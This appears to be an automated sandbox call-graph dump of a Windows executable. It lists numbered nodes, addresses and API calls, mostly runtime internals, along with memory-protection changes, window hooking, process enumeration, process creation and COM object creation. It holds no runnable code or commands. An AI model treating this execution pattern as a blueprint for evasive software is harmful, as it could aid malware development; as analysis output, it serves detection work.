9a1250 21746->21749 21748 9aff05 122 API calls 21747->21748 21748->21746 21757 9a11d0 21749->21757 21751 9a1270 21752 9a1274 21751->21752 21753 9a11d0 VirtualProtect 21751->21753 21752->21742 21754 9a1296 21753->21754 21754->21752 21755 9a11d0 VirtualProtect 21754->21755 21756 9a12b5 21755->21756 21756->21742 21758 9a11df 21757->21758 21759 9a1246 21757->21759 21758->21759 21760 9a11e6 VirtualProtect 21758->21760 21759->21751 21761 9a11fb 21760->21761 21761->21751 21763 9a54f0 ctype 79 API calls 21762->21763 21764 9a559a 21763->21764 21765 9a55d4 21764->21765 21766 9a5590 79 API calls 21764->21766 21770 aac44e 76 API calls 3 library calls 21765->21770 21766->21765 21768 9a55f0 21768->21690 21769->21688 21770->21768 21772 9a600b 21771->21772 21773 9a6019 21771->21773 21774 9a5f60 79 API calls 21772->21774 21790 9a5f60 21773->21790 21775 9a6014 21774->21775 21775->21699 21777 9a6031 21777->21699 21779 9aedbd 21778->21779 21782 9aedac 21778->21782 21780 9bd77f ctype 109 API calls 21779->21780 21781 9aedfb 21780->21781 21784 9a9598 21781->21784 21808 9aed3f 21781->21808 21782->21779 21824 9b8782 RaiseException __CxxThrowException@8 21782->21824 21784->21700 21784->21702 21788 9aee53 21825 9ac9c6 110 API calls ctype 21788->21825 21791 9a5f6e 21790->21791 21795 9a5f79 21790->21795 21804 9a5dc0 79 API calls ctype 21791->21804 21793 9a5f73 21793->21777 21794 9a54f0 79 API calls ctype 21794->21795 21795->21794 21799 9a5fef 21795->21799 21800 9a5e20 21795->21800 21805 aacda8 76 API calls 2 library calls 21795->21805 21806 aac44e 76 API calls 3 library calls 21795->21806 21799->21777 21801 9a5e30 21800->21801 21803 9a5e38 21801->21803 21807 9a5620 79 API calls 21801->21807 21803->21795 21804->21793 21805->21795 21806->21795 21807->21803 21809 9bcdbd ctype 103 API calls 21808->21809 21810 9aed55 21809->21810 21811 9aed60 21810->21811 21826 9b8782 RaiseException __CxxThrowException@8 21810->21826 21813 9aed6e GetCurrentThreadId SetWindowsHookExA 21811->21813 21814 9aed90 
21811->21814 21813->21814 21815 9aed8b 21813->21815 21817 9ab5af 21814->21817 21827 9b874a RaiseException __CxxThrowException@8 21815->21827 21818 9ab5bb __initptd 21817->21818 21819 9bd77f ctype 109 API calls 21818->21819 21820 9ab5c9 ActivateActCtx 21819->21820 21821 9ab5e0 CreateWindowExA 21820->21821 21823 9ab5dc __initptd 21820->21823 21828 9ab625 21821->21828 21823->21788 21825->21784 21829 9ab63d 21828->21829 21830 9ab633 GetLastError 21828->21830 21831 9ab63f DeactivateActCtx 21829->21831 21830->21831 21832 9ab64e SetLastError 21831->21832 21833 9ab655 21831->21833 21832->21833 21833->21823 21835 9a68d2 21834->21835 21836 9a68d0 21834->21836 21848 9a683b LoadResource LockResource SizeofResource 21835->21848 21836->21706 21838 9a68de 21838->21706 21839->21708 21841 9a5f2d 21840->21841 21842 9a5f37 21840->21842 21843 9a54f0 ctype 79 API calls 21841->21843 21844 9a5f52 21842->21844 21845 9a5e20 79 API calls 21842->21845 21843->21842 21846 9a6c4c WideCharToMultiByte 21844->21846 21845->21844 21846->21712 21847->21714 21848->21838 21849 9ad67f 21850 9ad692 21849->21850 21856 9ad68d 21849->21856 21857 9ac937 21850->21857 21853 9ad6b7 DefWindowProcA 21853->21856 21854 9ad6a5 21860 9ad57a 21854->21860 21874 9ac897 21857->21874 21859 9ac943 21859->21853 21859->21854 21861 9ad586 __EH_prolog3_catch_GS 21860->21861 21862 9bcdbd ctype 103 API calls 21861->21862 21863 9ad59b 21862->21863 21864 9ad5b2 21863->21864 22000 9b8782 RaiseException __CxxThrowException@8 21863->22000 21866 9ad615 21864->21866 22001 9ab92c GetWindowRect GetWindowLongA 21864->22001 21986 9aa7a6 21866->21986 21869 9ad63e 22003 aad32d 5 API calls __write_nolock 21869->22003 21875 9ac8a3 __EH_prolog3 21874->21875 21882 9bd7b2 21875->21882 21877 9ac8a8 ctype 21880 9ac8ef std::locale::_Init ctype 21877->21880 21887 9a6291 21877->21887 21880->21859 21883 9bd77f ctype 109 API calls 21882->21883 21884 9bd7b7 21883->21884 21892 9a843b 21884->21892 21890 9a6299 21887->21890 21889 9a62bb 21889->21880 21891 
9c2d86 77 API calls 3 library calls 21889->21891 21890->21889 21895 aacf9b 21890->21895 21891->21880 21893 9bcdbd ctype 103 API calls 21892->21893 21894 9a8445 21893->21894 21894->21877 21896 aad018 21895->21896 21901 aacfa9 21895->21901 21955 ab6403 DecodePointer 21896->21955 21898 aad01e 21956 aadb06 76 API calls __getptd_noexit 21898->21956 21902 aacfd7 RtlAllocateHeap 21901->21902 21905 aad004 21901->21905 21909 aad002 21901->21909 21911 ab67c1 21901->21911 21920 ab6612 21901->21920 21949 aac984 21901->21949 21952 ab6403 DecodePointer 21901->21952 21902->21901 21903 aad010 21902->21903 21903->21890 21953 aadb06 76 API calls __getptd_noexit 21905->21953 21954 aadb06 76 API calls __getptd_noexit 21909->21954 21957 ac064d 21911->21957 21913 ab67c8 21914 ac064d __NMSG_WRITE 76 API calls 21913->21914 21918 ab67d5 21913->21918 21914->21918 21915 ab6612 __NMSG_WRITE 76 API calls 21916 ab67ed 21915->21916 21917 ab6612 __NMSG_WRITE 76 API calls 21916->21917 21919 ab67f7 21917->21919 21918->21915 21918->21919 21919->21901 21921 ab6633 __NMSG_WRITE 21920->21921 21922 ab67b2 21921->21922 21923 ac064d __NMSG_WRITE 73 API calls 21921->21923 21966 aab46a 21922->21966 21925 ab664d 21923->21925 21927 ab675e GetStdHandle 21925->21927 21928 ac064d __NMSG_WRITE 73 API calls 21925->21928 21926 ab67bf 21926->21901 21927->21922 21931 ab676c 21927->21931 21929 ab665e 21928->21929 21929->21927 21930 ab6670 21929->21930 21930->21922 21932 ab667c 21930->21932 21931->21922 21933 ab678b _strlen 21931->21933 21974 aafcea 76 API calls ___crtsetenv 21932->21974 21936 ab67a2 WriteFile 21933->21936 21935 ab6691 21937 ab669c GetModuleFileNameW 21935->21937 21944 ab66c9 21935->21944 21936->21922 21938 ab66bd 21937->21938 21942 ab66dc _wcslen 21937->21942 21975 aafcea 76 API calls ___crtsetenv 21938->21975 21942->21944 21977 ab0df1 76 API calls ___crtsetenv 21942->21977 21978 ac05d8 76 API calls ___crtsetenv 21942->21978 21944->21942 21946 ab673f 21944->21946 21976 ab4b3b 10 API calls 
__call_reportfault 21944->21976 21979 ac05d8 76 API calls ___crtsetenv 21944->21979 21980 ac046c 22 API calls 2 library calls 21946->21980 21948 ab674f 21948->21922 21982 aac959 GetModuleHandleW 21949->21982 21952->21901 21953->21909 21954->21903 21955->21898 21956->21903 21958 ac0659 21957->21958 21960 ac0663 21958->21960 21964 aadb06 76 API calls __getptd_noexit 21958->21964 21960->21913 21961 ac067c 21965 ab4b8d 11 API calls ___crtsetenv 21961->21965 21963 ac0687 21963->21913 21964->21961 21965->21963 21967 aab472 21966->21967 21968 aab474 IsDebuggerPresent 21966->21968 21967->21926 21981 ac0028 21968->21981 21971 ab3352 SetUnhandledExceptionFilter UnhandledExceptionFilter 21972 ab336f __call_reportfault 21971->21972 21973 ab3377 GetCurrentProcess TerminateProcess 21971->21973 21972->21973 21973->21926 21974->21935 21975->21944 21976->21942 21977->21942 21978->21942 21979->21944 21980->21948 21981->21971 21983 aac96d GetProcAddress 21982->21983 21984 aac982 ExitProcess 21982->21984 21983->21984 21985 aac97d 21983->21985 21985->21984 22004 9af29a 21986->22004 22010 9af302 21986->22010 22018 9af344 21986->22018 22026 9af387 21986->22026 22032 9af2e0 21986->22032 22039 9af316 21986->22039 22047 9af330 21986->22047 22054 9af390 21986->22054 22060 9aeef6 21986->22060 22105 9af2b0 21986->22105 21987 9aa7ca 21988 9aa7e1 21987->21988 22114 9aa646 21987->22114 21988->21869 22002 9ad4d9 132 API calls 2 library calls 21988->22002 22001->21866 22002->21869 22005 9af2a3 22004->22005 22119 9a44b0 22005->22119 22008 9af4bc 22008->21987 22011 9af30b 22010->22011 22012 9ac90b 110 API calls 22011->22012 22013 9af2a7 22012->22013 22014 9af2ab 22013->22014 22017 9a44b0 234 API calls 22013->22017 22698 9ab846 LeaveCriticalSection RaiseException ctype 22014->22698 22016 9af4bc 22016->21987 22017->22014 22019 9af35b 22018->22019 22022 9af2ab 22018->22022 22020 9ac90b 110 API calls 22019->22020 22021 9af2a7 22020->22021 22025 9a44b0 234 API calls 22021->22025 22699 9ab846 
LeaveCriticalSection RaiseException ctype 22022->22699 22024 9af4bc 22024->21987 22025->22022 22027 9af2ab 22026->22027 22028 9af2a7 22026->22028 22700 9ab846 LeaveCriticalSection RaiseException ctype 22027->22700 22028->22027 22031 9a44b0 234 API calls 22028->22031 22030 9af4bc 22030->21987 22031->22027 22701 9bc05d 22032->22701 22034 9af2a7 22035 9af2ab 22034->22035 22038 9a44b0 234 API calls 22034->22038 22036 9ab846 LeaveCriticalSection RaiseException 22035->22036 22037 9af4bc 22036->22037 22037->21987 22038->22035 22040 9af30b 22039->22040 22045 9af2ab 22039->22045 22041 9ac90b 110 API calls 22040->22041 22044 9af2a7 22041->22044 22043 9af4bc 22043->21987 22044->22045 22046 9a44b0 234 API calls 22044->22046 22705 9ab846 LeaveCriticalSection RaiseException ctype 22045->22705 22046->22045 22048 9ac90b 110 API calls 22047->22048 22049 9af2a7 22047->22049 22048->22049 22050 9af2ab 22049->22050 22053 9a44b0 234 API calls 22049->22053 22706 9ab846 LeaveCriticalSection RaiseException ctype 22050->22706 22052 9af4bc 22052->21987 22053->22050 22055 9af2a3 22054->22055 22056 9af2ab 22054->22056 22059 9a44b0 234 API calls 22055->22059 22707 9ab846 LeaveCriticalSection RaiseException ctype 22056->22707 22058 9af4bc 22058->21987 22059->22056 22061 9aef05 __EH_prolog3 22060->22061 22062 9aef21 22061->22062 22063 9aef8a 22061->22063 22064 9aef7a 22061->22064 22068 9aef37 std::locale::_Init 22062->22068 22725 9ab846 LeaveCriticalSection RaiseException ctype 22062->22725 22065 9aef8f 22063->22065 22073 9aefa3 22063->22073 22066 9ac90b 110 API calls 22064->22066 22721 9ae919 118 API calls ctype 22065->22721 22070 9aef80 22066->22070 22068->21987 22732 9ab846 LeaveCriticalSection RaiseException ctype 22068->22732 22720 9ae8a1 117 API calls 22070->22720 22071 9aef9f 22071->22068 22071->22073 22073->22068 22708 9ab812 22073->22708 22075 9af4bc 22075->21987 22079 9af0fa 22724 9ab846 LeaveCriticalSection RaiseException ctype 22079->22724 22080 9af041 22080->22062 22080->22068 
22080->22079 22082 9af15b 22080->22082 22083 9af12f 22080->22083 22084 9af232 22080->22084 22085 9af177 22080->22085 22086 9af185 22080->22086 22089 9af137 22080->22089 22090 9af488 22080->22090 22098 9af1fb 22080->22098 22723 9ab846 LeaveCriticalSection RaiseException ctype 22080->22723 22082->22068 22092 9ac90b 110 API calls 22082->22092 22726 9bad30 109 API calls 22083->22726 22084->22068 22093 9ac90b 110 API calls 22084->22093 22088 9ac90b 110 API calls 22085->22088 22727 9ab862 109 API calls 22086->22727 22088->22068 22714 9a89d9 22089->22714 22731 9ab846 LeaveCriticalSection RaiseException ctype 22090->22731 22092->22068 22093->22068 22096 9af1a2 22097 9ac937 109 API calls 22096->22097 22100 9af1b4 22097->22100 22730 9badc5 110 API calls 22098->22730 22101 9af1ca 22100->22101 22728 9c2bbf RaiseException moneypunct ctype 22100->22728 22729 9ad6cc 110 API calls 3 library calls 22101->22729 22106 9ac90b 110 API calls 22105->22106 22107 9af2b8 22106->22107 22108 9ac90b 110 API calls 22107->22108 22109 9af2a7 22108->22109 22110 9af2ab 22109->22110 22113 9a44b0 234 API calls 22109->22113 22786 9ab846 LeaveCriticalSection RaiseException ctype 22110->22786 22112 9af4bc 22112->21987 22113->22110 22115 9aa677 CallWindowProcA 22114->22115 22116 9aa655 22114->22116 22117 9aa68a 22115->22117 22116->22115 22118 9aa663 DefWindowProcA 22116->22118 22117->21988 22118->22117 22127 9a8331 22119->22127 22126 9ab846 LeaveCriticalSection RaiseException ctype 22126->22008 22153 9ac865 22127->22153 22130 9a44c4 22132 9a3df0 22130->22132 22133 9a3e4f _memset 22132->22133 22134 9a3e9d 7 API calls 22133->22134 22232 9a3c20 22134->22232 22137 9a3c20 145 API calls 22138 9a3f47 22137->22138 22139 9a3c20 145 API calls 22138->22139 22141 9a3f5f _memset 22139->22141 22140 9a3fe3 22256 9a13b0 22140->22256 22141->22140 22142 9a6291 std::_Mutex::_Mutex 76 API calls 22141->22142 22144 9a3faf 22142->22144 22147 9a3fc3 22144->22147 22146 aab46a __write_nolock 5 API calls 22148 9a4038 Sleep 
22146->22148 22271 9a41d0 88 API calls __write_nolock 22147->22271 22150 aacbdc 22148->22150 22668 aaca9c 22150->22668 22152 9a44f1 22152->22126 22154 9bcdbd ctype 103 API calls 22153->22154 22155 9ac879 22154->22155 22156 9a833e 22155->22156 22173 9b8782 RaiseException __CxxThrowException@8 22155->22173 22156->22130 22158 9a81b8 22156->22158 22159 9a828c 22158->22159 22161 9a81dc 22158->22161 22160 aab46a __write_nolock 5 API calls 22159->22160 22162 9a82bc 22160->22162 22174 9b0a7a 22161->22174 22162->22130 22164 9a8217 22165 9a828e 22164->22165 22166 9a8220 22164->22166 22177 9ad091 22165->22177 22167 9ad091 125 API calls 22166->22167 22169 9a8249 22167->22169 22170 9ad091 125 API calls 22169->22170 22171 9a8266 22170->22171 22200 9b0dd3 SetWindowPos 22171->22200 22175 9b0a8c 22174->22175 22176 9b0a80 GetWindowLongA 22174->22176 22176->22164 22178 9ad0cd GetClientRect 22177->22178 22179 9ad0c4 22177->22179 22178->22179 22180 9ad0ea BeginDeferWindowPos 22179->22180 22181 9ad0f7 22179->22181 22182 9ad0fb GetTopWindow 22180->22182 22181->22182 22183 9ad10f GetDlgCtrlID 22182->22183 22195 9ad157 22182->22195 22186 9ac937 109 API calls 22183->22186 22184 9ad15f 22188 9ad171 22184->22188 22189 9ad164 CopyRect 22184->22189 22185 9ad184 22190 9ad1d8 22185->22190 22201 9ac90b 22185->22201 22187 9ad11e 22186->22187 22192 9ad148 GetWindow 22187->22192 22197 9ad136 SendMessageA 22187->22197 22193 aab46a __write_nolock 5 API calls 22188->22193 22189->22188 22190->22188 22191 9ad1dd KiUserCallbackDispatcher 22190->22191 22191->22188 22192->22183 22192->22195 22196 9ad1f3 22193->22196 22195->22184 22195->22185 22196->22159 22197->22192 22200->22159 22202 9ac897 ctype 109 API calls 22201->22202 22203 9ac919 22202->22203 22209 9c2e0e 22203->22209 22205 9ac925 22221 9b0e7c 22205->22221 22208 9aa887 12 API calls __write_nolock 22208->22190 22210 9c2e1a __EH_prolog3_catch 22209->22210 22220 9c2e23 std::locale::_Init ctype 22210->22220 22226 9c2bbf RaiseException moneypunct ctype 
22210->22226 22212 9c2e36 22212->22220 22227 9c2bbf RaiseException moneypunct ctype 22212->22227 22214 9c2e43 ctype 22214->22220 22228 9fb7b3 77 API calls 22214->22228 22216 9c2e72 22217 9c2e7d 22216->22217 22229 9b874a RaiseException __CxxThrowException@8 22216->22229 22230 9c2c32 77 API calls ctype 22217->22230 22220->22205 22222 9b0e88 22221->22222 22225 9ac92f 22221->22225 22223 9b0e8e GetParent 22222->22223 22222->22225 22231 9c2bbf RaiseException moneypunct ctype 22223->22231 22225->22190 22225->22208 22226->22212 22227->22214 22228->22216 22230->22220 22231->22225 22233 9a3c6f _memset 22232->22233 22272 9a39a0 22233->22272 22235 9a3c7f 22282 9a18a0 22235->22282 22239 9a3cee 22241 9a3d0d VirtualAlloc 22239->22241 22301 aac938 22239->22301 22243 9a3d39 _memmove 22241->22243 22304 9a3010 22243->22304 22248 9a3d9e 22320 9a3af0 22248->22320 22250 9a18a0 77 API calls 22250->22248 22253 9a3dc6 22254 aab46a __write_nolock 5 API calls 22253->22254 22255 9a3de6 22254->22255 22255->22137 22257 9a13bd __write_nolock 22256->22257 22656 9a12c0 CreateToolhelp32Snapshot Process32First 22257->22656 22259 9a13d5 22260 9a15e7 22259->22260 22263 9a13e0 _memset 22259->22263 22261 aab46a __write_nolock 5 API calls 22260->22261 22262 9a15f2 CreateProcessA 22261->22262 22262->22146 22264 9a145c 7 API calls 22263->22264 22667 aab050 22264->22667 22266 9a14e0 lstrcpyA CoInitialize CoCreateInstance 22268 9a1527 22266->22268 22269 9a15b8 CoUninitialize Sleep 22266->22269 22268->22269 22270 9a1584 MultiByteToWideChar 22268->22270 22269->22260 22270->22269 22271->22140 22273 9a39d7 22272->22273 22330 9a19d0 22273->22330 22275 9a3a15 22342 9a2be0 22275->22342 22278 9a3a47 22351 9a2380 22278->22351 22279 9a18a0 77 API calls 22279->22278 22283 9a18ba 22282->22283 22284 9a1977 GetTickCount 22282->22284 22287 9a18c9 22283->22287 22440 aab8c9 RaiseException 22283->22440 22298 aac926 22284->22298 22286 9a1908 22289 9a1942 22286->22289 22443 aaaf07 76 API calls std::exception::_Copy_str 
22286->22443 22287->22286 22441 aaaf07 76 API calls std::exception::_Copy_str 22287->22441 22445 aaaf07 76 API calls std::exception::_Copy_str 22289->22445 22290 9a18ed 22442 aab8c9 RaiseException 22290->22442 22293 9a195c 22446 aab8c9 RaiseException 22293->22446 22295 9a1927 22444 aab8c9 RaiseException 22295->22444 22447 ab4284 22298->22447 22302 ab4284 __getptd 76 API calls 22301->22302 22303 aac93d 22302->22303 22303->22239 22305 9a3055 22304->22305 22306 9a3079 22305->22306 22511 9a2800 77 API calls 22305->22511 22308 9a3093 22306->22308 22507 9a1ce0 22306->22507 22309 9a18a0 77 API calls 22308->22309 22310 9a3125 22308->22310 22309->22310 22312 9a313c 22310->22312 22512 9a2b80 77 API calls 22310->22512 22314 9a3870 22312->22314 22315 9a3892 22314->22315 22316 9a387e 22314->22316 22315->22248 22315->22250 22547 9a3370 22316->22547 22321 9a3b44 22320->22321 22322 9a3b6f 22321->22322 22323 9a3870 113 API calls 22321->22323 22643 9a1ab0 22322->22643 22323->22322 22326 ac6167 22327 ac6176 std::ios_base::_Tidy 22326->22327 22329 ac619b ctype 22327->22329 22655 9a10d0 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::_Init 22327->22655 22329->22253 22331 9a18a0 77 API calls 22330->22331 22332 9a1a0a 22331->22332 22333 9a6291 std::_Mutex::_Mutex 76 API calls 22332->22333 22334 9a1a11 22333->22334 22335 9a1a53 22334->22335 22362 ac5df9 22334->22362 22335->22275 22337 9a1a1f 22378 ac5aed 22337->22378 22395 9a1170 22342->22395 22347 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22348 9a2c3b 22347->22348 22349 ac5b15 std::locale::_Init LeaveCriticalSection 22348->22349 22350 9a2c5c 22349->22350 22350->22278 22350->22279 22434 ac6394 22351->22434 22354 9a6291 std::_Mutex::_Mutex 76 API calls 22355 9a23c9 22354->22355 22356 ac5df9 std::locale::_Init 79 API calls 22355->22356 22361 9a23fe 22355->22361 22357 9a23d7 22356->22357 22358 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22357->22358 22359 9a23ea 22358->22359 22360 ac5b15 
std::locale::_Init LeaveCriticalSection 22359->22360 22360->22361 22361->22235 22363 ac5e05 __EH_prolog3 22362->22363 22364 ac5e80 std::locale::_Init 22363->22364 22365 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22363->22365 22364->22337 22366 ac5e1b 22365->22366 22367 9a6291 std::_Mutex::_Mutex 76 API calls 22366->22367 22377 ac5e6a 22366->22377 22370 ac5e30 22367->22370 22368 ac5b15 std::locale::_Init LeaveCriticalSection 22368->22364 22369 ac5e3d 22386 ac5bbe 22369->22386 22370->22369 22390 ac5d56 76 API calls _Yarn 22370->22390 22375 ac5e5d 22392 9a1050 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::_Init 22375->22392 22377->22368 22379 9a1a32 22378->22379 22380 ac5aff 22378->22380 22382 ac5b15 22379->22382 22393 ac64ce EnterCriticalSection 22380->22393 22383 ac5b1c 22382->22383 22385 9a1a49 22382->22385 22394 ac64de LeaveCriticalSection 22383->22394 22385->22275 22387 ac5bcc 22386->22387 22388 ac5bdd 22386->22388 22389 ac64ee std::locale::_Setgloballocale RtlEncodePointer 22387->22389 22391 ac5cb1 76 API calls 3 library calls 22388->22391 22389->22388 22390->22369 22391->22375 22392->22377 22393->22379 22394->22385 22396 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22395->22396 22397 9a1191 22396->22397 22398 ac5b15 std::locale::_Init LeaveCriticalSection 22397->22398 22399 9a11a5 22398->22399 22400 9a25e0 22399->22400 22401 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22400->22401 22402 9a2612 22401->22402 22403 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22402->22403 22405 9a2656 22402->22405 22404 9a2635 22403->22404 22407 ac5b15 std::locale::_Init LeaveCriticalSection 22404->22407 22406 9a2696 22405->22406 22421 9a2200 22405->22421 22408 ac5b15 std::locale::_Init LeaveCriticalSection 22406->22408 22407->22405 22410 9a2706 22408->22410 22410->22347 22410->22350 22412 9a26c7 22413 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22412->22413 22415 9a26da 22413->22415 22418 ac5b15 std::locale::_Init 
LeaveCriticalSection 22415->22418 22416 9a26b9 22432 aab8c9 RaiseException 22416->22432 22419 9a26ee 22418->22419 22433 ac5b41 76 API calls std::_Mutex::_Mutex 22419->22433 22422 9a22c3 22421->22422 22423 9a2237 22421->22423 22422->22412 22431 aaaf63 76 API calls std::exception::exception 22422->22431 22423->22422 22424 9a6291 std::_Mutex::_Mutex 76 API calls 22423->22424 22426 9a2246 22424->22426 22425 9a228c 22425->22422 22427 9a2150 112 API calls 22425->22427 22426->22425 22428 9a20a0 113 API calls 22426->22428 22427->22422 22429 9a2271 22428->22429 22430 ac5a33 __Getctype 84 API calls 22429->22430 22430->22425 22431->22416 22432->22412 22433->22406 22435 9a6291 std::_Mutex::_Mutex 76 API calls 22434->22435 22436 ac63a0 22435->22436 22439 ac64ae InitializeCriticalSection 22436->22439 22438 9a23bb 22438->22354 22439->22438 22440->22287 22441->22290 22442->22286 22443->22295 22444->22289 22445->22293 22446->22284 22452 ab420b GetLastError 22447->22452 22449 ab428c 22450 aac930 22449->22450 22466 aacc26 22449->22466 22450->22239 22485 ab40c9 TlsGetValue 22452->22485 22455 ab4278 SetLastError 22455->22449 22458 ab423e DecodePointer 22459 ab4253 22458->22459 22460 ab426f 22459->22460 22461 ab4257 22459->22461 22495 aab4ab 22460->22495 22494 ab4157 76 API calls 3 library calls 22461->22494 22464 ab425f GetCurrentThreadId 22464->22455 22465 ab4275 22465->22455 22467 ab67c1 __FF_MSGBANNER 71 API calls 22466->22467 22468 aacc30 22467->22468 22469 ab6612 __NMSG_WRITE 71 API calls 22468->22469 22470 aacc38 22469->22470 22501 aacbf2 22470->22501 22473 aacc72 22474 aaccf3 22473->22474 22504 ab00ce 76 API calls ___crtsetenv 22473->22504 22474->22450 22476 aacc84 22477 aaccd6 EncodePointer EncodePointer 22476->22477 22478 aaccae 22476->22478 22479 aacc9f 22476->22479 22477->22474 22478->22474 22480 aacca8 22478->22480 22505 ab4ddb 76 API calls __realloc_crt 22479->22505 22480->22478 22483 aaccc4 EncodePointer 22480->22483 22506 ab4ddb 76 API calls __realloc_crt 22480->22506 
22483->22477 22484 aaccbe 22484->22474 22484->22483 22486 ab40f9 22485->22486 22487 ab40de DecodePointer TlsSetValue 22485->22487 22486->22455 22488 ab4d8f 22486->22488 22487->22486 22490 ab4d98 22488->22490 22489 abb065 _calloc 75 API calls 22489->22490 22490->22489 22491 ab4236 22490->22491 22492 ab4db6 Sleep 22490->22492 22491->22455 22491->22458 22493 ab4dcb 22492->22493 22493->22490 22493->22491 22494->22464 22496 aab4df __dosmaperr 22495->22496 22497 aab4b6 HeapFree 22495->22497 22496->22465 22497->22496 22498 aab4cb 22497->22498 22499 aadb06 ___crtsetenv 74 API calls 22498->22499 22500 aab4d1 GetLastError 22499->22500 22500->22496 22502 aaca9c __amsg_exit 76 API calls 22501->22502 22503 aacc03 RtlDecodePointer DecodePointer 22502->22503 22503->22473 22503->22474 22504->22476 22505->22480 22506->22484 22508 9a1cfa _memmove 22507->22508 22509 9a1d9f 22507->22509 22508->22509 22513 9a34b0 22508->22513 22509->22308 22511->22306 22512->22312 22516 9a34eb 22513->22516 22522 9a34ff 22513->22522 22514 aab46a __write_nolock 5 API calls 22515 9a3697 22514->22515 22515->22508 22517 9a3540 22516->22517 22521 9a3560 22516->22521 22516->22522 22525 aabd75 22517->22525 22519 9a3630 22519->22522 22546 9a2850 109 API calls _fputc 22519->22546 22521->22519 22521->22522 22544 aac61a 109 API calls 3 library calls 22521->22544 22545 9a2e10 77 API calls std::_Xinvalid_argument 22521->22545 22522->22514 22526 aabd81 __initptd 22525->22526 22527 aabdac 22526->22527 22528 aabd94 22526->22528 22530 aac094 __lock_file 77 API calls 22527->22530 22529 aadb06 ___crtsetenv 76 API calls 22528->22529 22531 aabd99 22529->22531 22532 aabdb2 22530->22532 22533 ab4b8d ___crtsetenv 11 API calls 22531->22533 22534 ab2cd9 __ungetc_nolock 76 API calls 22532->22534 22538 aabe27 22532->22538 22540 aabda4 __initptd 22533->22540 22537 aabdc2 22534->22537 22535 aabe35 22536 aabe69 _fputc LeaveCriticalSection LeaveCriticalSection 22535->22536 22536->22540 22537->22538 22541 aadb06 ___crtsetenv 76 API 
calls 22537->22541 22538->22535 22539 ab4b9d __flsbuf 107 API calls 22538->22539 22539->22535 22540->22522 22542 aabe1c 22541->22542 22543 ab4b8d ___crtsetenv 11 API calls 22542->22543 22543->22538 22544->22521 22545->22521 22546->22522 22550 9a341c 22547->22550 22553 9a33a8 22547->22553 22548 aab46a __write_nolock 5 API calls 22549 9a34ab 22548->22549 22554 aac8b2 22549->22554 22550->22548 22553->22550 22567 aac61a 109 API calls 3 library calls 22553->22567 22568 9a2e10 77 API calls std::_Xinvalid_argument 22553->22568 22555 aac8be __initptd 22554->22555 22556 aac8d0 22555->22556 22557 aac8e5 22555->22557 22591 aadb06 76 API calls __getptd_noexit 22556->22591 22561 aac8e0 __initptd 22557->22561 22569 aac094 22557->22569 22560 aac8d5 22592 ab4b8d 11 API calls ___crtsetenv 22560->22592 22561->22315 22567->22553 22568->22553 22570 aac0c8 EnterCriticalSection 22569->22570 22571 aac0a6 22569->22571 22572 aac0be 22570->22572 22571->22570 22573 aac0ae 22571->22573 22575 aac845 22572->22575 22594 ab5091 22573->22594 22576 aac856 22575->22576 22578 aac86a 22575->22578 22641 aadb06 76 API calls __getptd_noexit 22576->22641 22580 aac866 22578->22580 22601 aac172 22578->22601 22579 aac85b 22642 ab4b8d 11 API calls ___crtsetenv 22579->22642 22593 aac91e LeaveCriticalSection LeaveCriticalSection _setvbuf 22580->22593 22587 aac884 22618 ab5f61 22587->22618 22589 aac88a 22589->22580 22590 aab4ab _free 76 API calls 22589->22590 22590->22580 22591->22560 22592->22561 22593->22561 22595 ab50b9 EnterCriticalSection 22594->22595 22596 ab50a6 22594->22596 22595->22572 22597 ab4fcf __mtinitlocknum 75 API calls 22596->22597 22598 ab50ac 22597->22598 22598->22595 22599 aacc26 __amsg_exit 75 API calls 22598->22599 22600 ab50b8 22599->22600 22600->22595 22602 aac1ad 22601->22602 22603 aac18b 22601->22603 22607 ab596e 22602->22607 22603->22602 22604 ab2cd9 __ungetc_nolock 76 API calls 22603->22604 22605 aac1a6 22604->22605 22606 ab57c1 __write 107 API calls 22605->22606 22606->22602 22608 
ab597e 22607->22608 22609 aac87e 22607->22609 22608->22609 22610 aab4ab _free 76 API calls 22608->22610 22611 ab2cd9 22609->22611 22610->22609 22612 ab2cfa 22611->22612 22613 ab2ce5 22611->22613 22612->22587 22614 aadb06 ___crtsetenv 76 API calls 22613->22614 22615 ab2cea 22614->22615 22616 ab4b8d ___crtsetenv 11 API calls 22615->22616 22617 ab2cf5 22616->22617 22617->22587 22619 ab5f6d __initptd 22618->22619 22620 ab5f90 22619->22620 22621 ab5f75 22619->22621 22623 ab5f9c 22620->22623 22626 ab5fd6 22620->22626 22622 aadb19 __write_nolock 76 API calls 22621->22622 22624 ab5f7a 22622->22624 22625 aadb19 __write_nolock 76 API calls 22623->22625 22627 aadb06 ___crtsetenv 76 API calls 22624->22627 22628 ab5fa1 22625->22628 22629 ab2a7a ___lock_fhandle 78 API calls 22626->22629 22635 ab5f82 __initptd 22627->22635 22630 aadb06 ___crtsetenv 76 API calls 22628->22630 22631 ab5fdc 22629->22631 22632 ab5fa9 22630->22632 22633 ab5fea 22631->22633 22634 ab5ff6 22631->22634 22636 ab4b8d ___crtsetenv 11 API calls 22632->22636 22637 ab5ec5 __close_nolock 79 API calls 22633->22637 22638 aadb06 ___crtsetenv 76 API calls 22634->22638 22635->22589 22636->22635 22639 ab5ff0 22637->22639 22638->22639 22640 ab601d __close LeaveCriticalSection 22639->22640 22640->22635 22641->22579 22642->22580 22644 9a1aca 22643->22644 22650 9a1afc ctype 22643->22650 22647 ac5aed std::_Lockit::_Lockit EnterCriticalSection 22644->22647 22644->22650 22646 9a1b1f 22646->22326 22648 9a1adb 22647->22648 22649 ac5b15 std::locale::_Init LeaveCriticalSection 22648->22649 22649->22650 22651 ac63ae 22650->22651 22654 ac64be DeleteCriticalSection 22651->22654 22653 ac63ba ctype 22653->22646 22654->22653 22655->22329 22657 9a1316 Process32Next 22656->22657 22658 9a1306 22656->22658 22660 9a138f FindCloseChangeNotification 22657->22660 22664 9a132d 22657->22664 22659 aab46a __write_nolock 5 API calls 22658->22659 22661 9a1312 22659->22661 22662 aab46a __write_nolock 5 API calls 22660->22662 22661->22259 22663 9a13a8 
